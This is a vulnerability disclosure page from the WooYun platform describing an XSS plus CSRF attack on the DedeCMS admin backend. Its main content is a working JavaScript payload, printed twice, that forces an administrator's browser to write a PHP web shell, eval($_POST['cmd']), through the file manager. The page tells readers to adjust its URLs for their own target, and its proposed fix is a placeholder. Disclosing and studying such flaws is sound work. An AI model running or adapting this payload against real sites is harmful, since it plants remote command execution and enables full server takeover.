dedecms利用xss+csrf getshell | wooyun-2013-025175| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-025175

漏洞标题：dedecms利用xss+csrf getshell

漏洞作者： sky

提交时间：2013-06-06 12:11

修复时间：2013-06-11 12:12

公开时间：2013-06-11 12:12

漏洞类型：网络设计缺陷/逻辑错误

危害等级：中

自评Rank：8

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-06-06：细节已通知厂商并且等待厂商处理中
2013-06-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。

详细说明：

后台可触发xss

利用js代码

var request = false;
	if(window.XMLHttpRequest) {
	request = new XMLHttpRequest();
	if(request.overrideMimeType) {
	request.overrideMimeType('text/xml');
	}
	} else if(window.ActiveXObject) {
	var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
	for(var i=0; i<versions.length; i++) {
	try {
	request = new ActiveXObject(versions[i]);
	} catch(e) {}
	}
	}
	xmlhttp=request;
	 
	getshell();
	function getshell(){
	 
	var postStr="fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改
	 
	xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);//url需要自己修改
	xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xmlhttp.setRequestHeader("Content-length", postStr.length);
	xmlhttp.setRequestHeader("Connection", "close");
	xmlhttp.send(postStr);
	}

触发前

触发后

漏洞证明：

后台可触发xss

利用js代码

var request = false;
	if(window.XMLHttpRequest) {
	request = new XMLHttpRequest();
	if(request.overrideMimeType) {
	request.overrideMimeType('text/xml');
	}
	} else if(window.ActiveXObject) {
	var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
	for(var i=0; i<versions.length; i++) {
	try {
	request = new ActiveXObject(versions[i]);
	} catch(e) {}
	}
	}
	xmlhttp=request;
	 
	getshell();
	function getshell(){
	 
	var postStr="fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改
	 
	xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);//url需要自己修改
	xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
	xmlhttp.setRequestHeader("Content-length", postStr.length);
	xmlhttp.setRequestHeader("Connection", "close");
	xmlhttp.send(postStr);
	}

触发前

触发后

修复方案：

XXOO

版权声明：转载请注明来源 sky@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2013-06-11 12:12

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-025175

漏洞标题：dedecms利用xss+csrf getshell

相关厂商：Dedecms

漏洞作者： sky

提交时间：2013-06-06 12:11

修复时间：2013-06-11 12:12

公开时间：2013-06-11 12:12

漏洞类型：网络设计缺陷/逻辑错误

危害等级：中

自评Rank：8

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sky@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-025175

漏洞标题：dedecms利用xss+csrf getshell

相关厂商：Dedecms

漏洞作者： sky

提交时间：2013-06-06 12:11

修复时间：2013-06-11 12:12

公开时间：2013-06-11 12:12

漏洞类型：网络设计缺陷/逻辑错误

危害等级：中

自评Rank：8

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-025175"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 sky@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：